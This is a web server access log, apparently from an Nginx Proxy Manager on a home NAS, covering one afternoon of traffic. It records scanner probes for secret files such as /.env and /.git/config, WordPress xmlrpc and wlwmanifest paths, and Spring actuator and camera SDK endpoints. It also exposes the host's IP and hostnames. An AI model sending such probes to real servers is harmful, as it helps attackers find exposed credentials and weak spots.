"/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:13:28:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:28:22 +0000] 400 - - http localhost "-" [Client 172.210.81.91] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:37:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 40.124.174.138] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[02/Feb/2026:13:38:48 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:42:38 +0000] 400 - GET http pma.profibot.synology.me "/" [Client 167.94.138.182] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:13:42:47 +0000] 400 - - http localhost "-" [Client 167.94.138.182] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:44:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:49:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:49:53 +0000] 200 - GET http pma.profibot.synology.me "/" [Client 66.132.153.140] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:13:49:55 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.140] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:49:56 +0000] 400 - GET http pma.profibot.synology.me "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:13:49:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 66.132.153.140] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:53:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:55:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:09:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:13:20 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:14:15:51 +0000] 400 - GET http 78.131.122.113 "/.env" [Client 162.243.121.238] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[02/Feb/2026:14:15:52 +0000] 400 - GET http 78.131.122.113 "/.git/config" [Client 162.243.121.238] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[02/Feb/2026:14:18:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:33:07 +0000] 200 - GET http 78.131.122.113 "/" [Client 176.65.139.8] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0" "-" +[02/Feb/2026:14:40:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:44:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:45:06 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:50:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:50:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:51:29 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:14:56:50 +0000] 400 - - http localhost "-" [Client 85.217.140.9] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:15:10:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:13:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:29:28 +0000] 404 - GET http 78.131.122.113 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0" "-" +[02/Feb/2026:15:33:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:36:46 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:40:59 +0000] 404 - GET http 78.131.122.113 "/developmentserver/metadatauploader" [Client 20.64.106.155] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[02/Feb/2026:15:43:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:45:33 +0000] 404 - GET http 78.131.122.113 "/.env" [Client 45.119.83.253] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[02/Feb/2026:15:45:36 +0000] 404 - GET http 78.131.122.113 "/env" [Client 45.119.83.253] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[02/Feb/2026:15:47:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:55:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:15:56:44 +0000] 404 - GET http 78.131.122.113 "/.env" [Client 45.119.83.253] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[02/Feb/2026:15:56:46 +0000] 404 - GET http 78.131.122.113 "/env" [Client 45.119.83.253] [Length 150] [Gzip -] "Mozilla/5.0" "-" +[02/Feb/2026:16:00:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:06:47 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.46.194.83] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:48 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.46.194.83] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:49 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php?rsd" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:49 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.46.194.83] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/blog/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/web/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/wordpress/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/website/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/news/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/2018/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/2019/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/shop/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp1/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/test/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/media/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp2/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/site/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/cms/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/sito/wp-includes/wlwmanifest.xml" [Client 34.46.194.83] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:16:06:58 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.46.194.83] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:16:17:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:25:09 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[02/Feb/2026:16:27:42 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:30:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:32:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:43:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:43:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:46:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:50:12 +0000] 400 - GET http 78.131.122.113 "/" [Client 176.65.139.13] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:16:51:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:00:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[02/Feb/2026:17:17:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:18:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:24:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:32:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:43:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:52:24 +0000] 200 - GET http 78.131.122.113 "/" [Client 54.224.216.139] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[02/Feb/2026:17:56:38 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:17:58:18 +0000] 200 - GET http 192.168.100.43 "/" [Client 192.168.100.179] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0" "-" +[02/Feb/2026:17:58:19 +0000] 400 - GET http 192.168.100.43 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:18:09:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:15:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:17:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 146.19.24.133] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[02/Feb/2026:18:19:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[02/Feb/2026:18:19:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:21:10 +0000] 400 - - http localhost "-" [Client 210.176.44.217] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:18:30:06 +0000] 200 - GET http 78.131.122.113 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:18:31:07 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:34:06 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:53:11 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:18:54:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:01:41 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:07:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:23:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:27:11 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:33:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:51:15 +0000] 404 - GET http 78.131.122.113 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[02/Feb/2026:19:53:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:19:54:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:02:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:08:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:20:11:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[02/Feb/2026:20:11:29 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" 